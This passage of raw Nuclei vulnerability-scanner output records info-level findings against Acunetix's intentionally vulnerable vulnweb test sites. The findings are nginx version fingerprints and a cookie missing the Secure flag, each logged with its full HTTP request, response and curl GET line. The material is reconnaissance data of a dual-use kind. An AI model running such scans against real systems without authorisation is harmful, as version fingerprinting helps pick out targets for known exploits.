'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.632831172Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.688869012Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_13_7) AppleWebKit/570.18 (KHTML, like Gecko) Version/13.0 Safari/570.18\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:36.689052874Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_13_7) AppleWebKit/570.18 (KHTML, like Gecko) Version/13.0 Safari/570.18' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/cookies-without-secure.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/cookies-without-secure\",\"template-id\":\"cookies-without-secure\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/cookies-without-secure.yaml\",\"info\":{\"name\":\"Cookies without Secure attribute - Detect\",\"author\":[\"vthiery\"],\"tags\":[\"misconfig\",\"http\",\"cookie\",\"generic\"],\"description\":\"Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS\\n\",\"impact\":\"Lack of Secure flag on cookies allows the cookie to be sent over unsecure HTTP, making it vulnerable to man-in-the-middle (MITM) attacks.\\n\",\"reference\":[\"https://owasp.org/www-community/controls/SecureCookieAttribute\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cvss-metrics\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"},\"remediation\":\"Ensure that all cookies are set with the Secure attribute to prevent MITM attacks.\\n\"},\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=yqqlv5rvfxxko131fkruqp55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" 